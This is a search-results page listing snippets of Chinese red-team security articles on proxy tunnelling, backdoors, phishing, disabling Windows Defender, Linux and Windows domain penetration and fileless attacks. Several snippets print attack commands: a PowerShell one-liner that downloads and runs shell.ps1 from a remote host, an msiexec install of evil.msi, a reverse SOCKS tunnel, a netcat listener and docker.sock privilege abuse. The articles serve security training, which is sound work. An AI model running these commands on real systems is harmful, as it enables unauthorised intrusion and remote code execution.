首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏鸿鹄实验室

    对抗】内网代理转发

    直接使用远程桌面服务连接1.1.1.1:33889 0x04.3 基于web服务的socks5隧道 基于web服务的socks5隧道的优点是,在内网服务器不通外网的情况下也能正常使用。 本地电脑成功通过socks5带进了目标主机的内网。(若失败,可能是某些防护检测到了异常流量,可采用reDuh) 本地电脑直接远程连接目标主机的内网ip。 然后在目标主机中执行: ew_for_Win.exe -s rssocks -d 1.1.1.1 -e 11000 socks5隧道建立成功,成功把自己的主机带进目标内网。 [socks5_proxy] type = tcp remote_port = 11000 plugin = socks5 plugin_user = xxx plugin_passwd = xxx 以NSSM来进行示例,封装frpc为系统服务,建立持久的socks5隧道。 启动nssm图形化界面。 nssm install name 选择想要注册服务的exe应用。 设置服务的名字。

    2.8K20发布于 2021-12-01
  • 来自专栏安恒网络空间安全讲武堂

    APT对抗(二) 对抗关于后门对抗

    第二季 这次继续围绕第一篇,第一季关于后门: 《APT对抗(一) 对抗关于后门对抗》做整理与补充。再深入一步细化demo notepad++。 作为攻击者,要首先考虑到对抗成本,什么样的对抗成本。影响或阻碍对手方的核心利益。把概念加入到后门,更隐蔽,更长久。 文章的标题既然为APT对抗(二) 对抗关于后门对抗,那么文章的本质只做技术研究,Demo本身不具备攻击或者持续控制权限功能。

    69020发布于 2019-09-03
  • 来自专栏安恒网络空间安全讲武堂

    APT对抗(一) 对抗关于后门对抗

    攻击者与防御者的本质对抗是什么? 增加对方在对抗中的时间成本,人力成本。 这里要引用百度对APT的解释: APT是指高级持续性威胁。 做为攻击者的对抗,无开放端口,无残留文件,无进程,无服务。在防御者处理完攻击事件后的一定时间内,再次激活。 5.后门的生成 大体分为四类: 1.有目标源码 2.无目标源码 3.无目标源码,有目标api 4.无目标源码,无api,得到相关漏洞等待触发 结合后门生成分类来举例细说几个demo。 在win下又以iis为主,在iis中目前主要分为iis5.x ,iis6.x,大于等于iis7.x。iis7以后有了很大的变化,尤其引入模块化体系结构。 同样,目前国内市场另一种常见组合XAMP(WIN+Apche+mysql+php,与Linux+Apche+mysql+php),php5.x 与php7.x有了很大的变化,PHP7将基于最初由Zend

    1.3K10发布于 2019-09-03
  • 来自专栏腾讯安全应急响应中心

    对抗之邮件钓鱼攻击

    文|腾讯蓝军 jumbo 对抗越加普遍及重要,甚至成为了大型赛事,随之⽽来的是防守方大量部署安全设备,如FW、WAF、IDS、IPS等,想要从Web端深⼊到对⽅内⽹已经困难重重。 但是,⼈永远是最⼤的弱点,在日渐增多的防护设备⾯前,钓⻥攻击(Phishing)已经成为对抗中⼀种必不可少且非常有效的攻击⼿法(近期也见到实际攻击中针对HR的邮件钓鱼攻击),一旦有人中招,攻击队就直接能进 我们讨论下,为什么简历投递钓鱼在腾讯蓝军的远程办公安全演习、其他对抗项目中效果出类拔萃呢?

    1.5K20发布于 2020-09-07
  • 来自专栏红蓝对抗

    对抗之致盲 Windows defender

    Exclusions" /s #查看版本 dir "C:\ProgramData\Microsoft\Windows Defender\Platform\" /od /ad /b #查看篡改保护(返回结果中的 数值5代表开启 27rvHpsnldnxpJaxwQrLGw https://zhuanlan.zhihu.com/p/538571344 https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%

    1.5K40编辑于 2022-12-23
  • 来自专栏腾讯安全应急响应中心

    对抗之Linux内网渗透

    在控制A机器时,利用socks代理进入A机器所在内网 ssh -qTfnN -D 1111 root@AIP 输入A机器密码,本地利用proxychains等类似工具连接本地的1111端口的sock5连接即可代理 docker.sock d6e46aa2470d 比如我们控制了上述容器,并发现其挂载了docker.sock: image051.png 那么我们可以利用/var/run/docker.sock创建特权容器(附录5) 腾讯蓝军也会持续和大家分享更多攻防知识,希望能够和大家共同成长,提高整体对抗水平。 文中涉及的技术信息,只限用于技术交流,切勿用于非法用途。欢迎探讨交流,行文仓促,不足之处,敬请不吝批评指正。 【附录】 附录1 对抗之windows内网渗透 附录2 pspy: https://github.com/DominicBreuker/pspy 附录3 bash: https://Linux.die.net /man/1/bash 附录4 setuid: https://man7.org/linux/man-pages/man2/setuid.2.html 附录5 创建特权容器: https://github.com

    2.3K20发布于 2020-12-11
  • 来自专栏HACK学习

    Red Team | 内部对抗框架

    如果你想看关于Red Team的秘密 请继续往下翻哦 Red Team首次公开部分红对抗框架 公开内容共分14个模块 准备钓鱼攻击 发送钓鱼邮件 发送payload 运行payload命令 维持本地持久化 常见的队侦查和预防控制 ? 02 发送钓鱼邮件(到目标组织员工邮箱地址) 常见的队攻击向量和技术 ? 常见的队侦查和预防控制 ? 常见的队侦查和预防控制 ? 05 维持本地持久化(在目标组织员工系统上) 常见的队攻击向量和技术 ? 常见的队侦查和预防控制 ? 常见的队侦查和预防控制 ? 08 执行本地侦察/发现(在员工系统上) 常见的队攻击向量和技术 ? 常见的队侦查和预防控制 ? 常见的队侦查和预防控制 ? 11 升级域权限(通过常见的载体) 常见的队攻击向量和技术 ? 常见的队侦查和预防控制 ?

    1.2K31发布于 2019-09-10
  • 来自专栏网络安全攻防

    对抗之无文件落地攻击

    -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.129:1234/shell.ps1'))" Step 5: nc -lvp 6666 Step 4:在目标主机中执行以下命令实现无文件落地执行载荷 msiexec /q /i http://192.168.174.129:1234/evil.msi Step 5: 将shell.exe文件传送到Windows Server 2008 R2的c盘 Step 4:开启Windows Server 2012中的WinRM winrm quickconfig Step 5:

    46610编辑于 2024-06-08
  • 来自专栏红蓝对抗

    对抗|常用攻防工具大全

    github.com/1in9e/gosint 分布式资产信息收集和漏洞扫描平台 ApolloScanner https://github.com/b0bac/ApolloScanner 自动化巡航扫描框架(可用于队打点评估 AppInfoScanner https://github.com/kelvinBen/AppInfoScanner 移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具 集成GoogleHacking burpFakeIP burpFakeIP 自动发送请求 https://github.com/nccgroup/AutoRepeater AutoRepeater Hack-Tools 适用于队的浏览器扩展插件 github.com/Summer177/seeyon_exp seeyon_exp 通达OA综合利用工具 https://github.com/xinyu2428/TDOA_RCE TDOA_RCE 凌 icmpsh icmpsh 正/反向代理,内网穿透,端口转发 https://github.com/inconshreveable/ngrok ngrok pingtunnel 是把 tcp/udp/sock5

    6.3K23编辑于 2022-06-30
  • 来自专栏小生观察室

    对抗之域渗透技巧

    视频内容 对抗之域渗透技巧 1080P超清版 微信公众号平台本身会对素材进行二次压缩,会导致画面出现不清晰等情况。 如有需要查看超清1080P版视频,可以选用以下2种方式进行查看。 v=iQEp1X5cTfA 其他说明 本视频基于直播内容进行了剪辑和优化,去除多余杂音及跳帧画面 添加片头增强舒适度,提高观赏性。

    74920发布于 2021-04-21
  • 来自专栏腾讯安全应急响应中心

    对抗之近源渗透

    文|作者:腾讯企业IT部 安全运营中心 yyf 编者按 近源渗透(物理渗透)是对抗演练中的一个关键点,从相关新闻及实际测试结果来看,许多企业线上部署各种安全设备严阵以待,结果马奇诺防线在线下被物理渗透绕过 一、什么是对抗 对抗原本是一个军事概念,指在部队模拟对抗时,专门成立一个扮演假想敌的部队(蓝军)与我方正面部队(红军)进行对抗性演练。 通过周期性的对抗攻防演习,持续性地提高企业在攻击防护、威胁检测、应急响应方面的能力。 需要注意,国外流行使用Red Team(队)代表攻击方,Blue Team(队)代表防守方。 在本文中,笔者将挑选其中较为通用且容易在对抗中实施的近源渗透技术进行探讨。 可以预见,越来越多的公司和团队会希望对抗等攻防演习活动能覆盖到企业的物联网环境,挖掘近源环境下的潜在安全威胁。

    1.7K40发布于 2020-09-24
  • 来自专栏腾讯安全应急响应中心

    对抗之Windows内网渗透

    对抗之Windows内网渗透 作者 jumbo@腾讯蓝军 前言 无论是渗透测试,还是对抗,目的都是暴露风险,促进提升安全水平。 而国内外对抗服务和开源攻击工具大多数以攻击Windows域为主,主要原因是域控拥有上帝能力,可以控制域内所有员工电脑,进而利用员工的合法权限获取目标权限和数据,达成渗透目的。 /domain:child.jumbolab.com /sid:S-1-5-21-1786649982-4053697927-1628754434 /sids:S-1-5-21-4288736272- 同时预告一下,也算是立个flag:为了让对抗不用过于依靠个人经验和能力以及提升对抗效率,腾讯蓝军的对抗自动化工具平台正在筹建中,希望投入实战后有机会再跟大家一起交流学习。 Kerbrute: https://github.com/ropnop/kerbrute Responder: https://github.com/lgandx/Responder 相关阅读: 网络空间安全时代的对抗建设

    2.4K31发布于 2020-07-01
  • 来自专栏红蓝对抗

    对抗|常见技战法总结

    5、布置内网诱捕陷阱。 一是边界区域部署办公系统蜜罐。二是在核心计算区域布置核心系统和集权系统蜜罐。三是将真实系统的非业务端口访问流量转发至蜜罐,第一时间发现内网扫描行为。 0信任安全网关 4.连环陷阱的apt攻击捕获战法 基于主动防御理念,利用 动态伪装和反向水坑,对抗0day高级攻击者。 5.零信任架构,保障vpn始终在线 可实现几个关键目标 1、vpn始终在线 2、安全防御足够,有效切断攻击方的攻击链条 3、运行过程灵活自动,避免运维人力大量投入。 黑客指纹收集 依托蜜罐系统生成黑客指纹库,指纹库融合了系统、设备、html5 webGL、HTML5 Canvas、第三方网站ID指纹等。

    8.5K61编辑于 2022-08-05
  • 来自专栏红蓝对抗

    对抗|后渗透—CS插件OLa

    一款CS后渗透模块插件,让大家使用一款插件就够了,本插件集大家之所长(其实就是重复造轮子了),本插件后期也会持续更新,欢迎各位老师关注!

    84820编辑于 2022-08-05
  • 来自专栏FreeBuf

    对抗中的近源渗透

    01 什么是对抗 对抗原本是一个军事概念,指在部队模拟对抗时,专门成立一个扮演假想敌的部队(蓝军)与我方正面部队(红军)进行对抗性演练。 在信息安全领域中的对抗也是类似的思路,一方扮演黑客,另一方扮演防守者进行网络安全攻防演练。在演练过程中,蓝军模拟真实的攻击来评估企业现有防守体系的安全能力,红军对发现的问题做出相应的优化整改。 通过周期性的对抗攻防演习,持续性地提高企业在攻击防护、威胁检测、应急响应方面的能力。 需要注意,国外流行使用Red Team(队)代表攻击方,Blue Team(队)代表防守方。 在本文中,笔者将挑选其中较为通用且容易在对抗中实施的近源渗透技术进行探讨。 可以预见,越来越多的公司和团队会希望对抗等攻防演习活动能覆盖到企业的物联网环境,挖掘近源环境下的潜在安全威胁。

    1.3K40发布于 2020-09-24
  • 来自专栏渗透云笔记

    对抗 | 内网渗透实战技巧

    对抗中,拿到了入口站点,我们首先会想办法获取入口点的shell,再以此挂隧道通内网。而拿shell无非是上传木马、SQL注入、反序列化。 其实新版的MSF也有了socks5代理,不过好像也不是很好用。 ? MS17-010 永恒之在内网渗透中是屡试不爽的,基本上一打一大片。 但是MS17-010在实际对抗渗透中(通过代理打内网)并不好利用,MSF中自带的模块要打很多次才能成功一次,而且MSF自带的模块打sever2003的机器很容器蓝屏。 所以在真实对抗中不建议使用该漏洞,除非有百分百的把握能打成功 ? ? ?

    2.2K31发布于 2020-03-12
  • 来自专栏湛卢工作室

    对抗——加密Webshell“冰蝎”攻防

    按照流程,客户端首先get请求生产随机密钥,server返回生成的16位密钥:0x7037af5d95561f3d。 这个get请求的session ID为 466geshjq6hr15kbmd72ju24g5。 最后,RASP 可以对抗未知漏洞。发生攻击时,边界防护设备无法掌握应用下一步的动向。RASP 技术可以识别出异常的程序逻辑,比如反序列化漏洞导致的命令执行,因此可以对抗未知漏洞。 0x04 总结 随着攻防对抗的不断升级,攻击方的手段越来越隐蔽,很多攻击流量都会进行加密,给防守方带来了较大挑战,相信后续对加密攻击流量检测的研究也会越来越多。

    5.1K30发布于 2019-11-20
  • 来自专栏Ms08067安全实验室

    Ms08067队学员 “实战对抗”报告

    MS08067队攻防从第二期班开始增加了“实战对抗”环节,为了模拟真实环境将采用两个不同的云服务提供商搭建真实环境,将同学分为AB两队,一攻一守,实现既有攻击也要有防御更要有反制的全面内容实战。 以下为第3期实战对抗报告:

    99620编辑于 2021-12-28
  • 来自专栏FreeBuf

    对抗场景下的二三事

    谨以此文讨论一下在对抗场景下几个关键的技术点的二三事 ? xp_cmdshell之后,一个突破口带来的就是内网漫游扩大战果了;大多数用户往往也不会更改数据的端口都是默认的1521、3306、1433等,攻击者拿出扫描器就扫描这些数据库端口正中下怀,改成一个特定的5位数的端口 0x07攻防对抗 攻防对抗的场景下和传统的僵尸网络、木马、蠕虫病毒类的检测方法有相当大的差异性,主要表现在传统的恶意程序更多的趋向于自动化攻击,其攻击特点表现在比较固定利用的漏洞、EXP都相差无几且特征比较明显 由于对抗场景下的很多行为也不是真正意义上的悄无声息,由于大多数攻击者对受害者网络里的业务逻辑并不是很熟悉,所以常常会出现很大层面的异常,这就埋下了被发现的隐患。 安全对抗的表面是攻击技术与检测防御的技术演进,本质是人与人之间的投入、技术的博弈。

    94830发布于 2020-04-22
  • 来自专栏信安之路

    对抗技术怎么学,学什么?

    对抗是最近很火的一个词,也是非常多小伙伴想要学习的技术方向,那么什么是对抗,如何学习? 这篇文章主要以老外整理的框架 ATT&CK 来看,我们如何学习对抗的技术,怎么提升自身的技术能力,更好的提升整体的安全能力。 5、鱼叉式附件:发送钓鱼邮件或者消息,将捆绑恶意代码的应用或者文件发送给受害者,在受害者打开或者运行文件时,释放并运行恶意代码,从而达到获取权限的目的。 绕过防御 随着安全行业的发展,越来越多的安全公司和安全产品被很多公司所使用,在对抗过程中会遇到非常多各式各样的安全产品,如何绕过防御就成了攻击方难以逾越的门槛,对抗无止境,没有百分之百安全的系统,也没有百分之百可以防御的安全产品 从学习技术的角度,按照 ATT&CK 的框架来学习攻击技术一定是可以的,但不一定在实际的攻防对抗中全部用到,可以优先选择最有效的技术点来学习,然后在实际的对抗中,遇到常规技术无法继续的时候,可以再去有针对性的学习其他的技术

    2.5K20发布于 2019-11-26
领券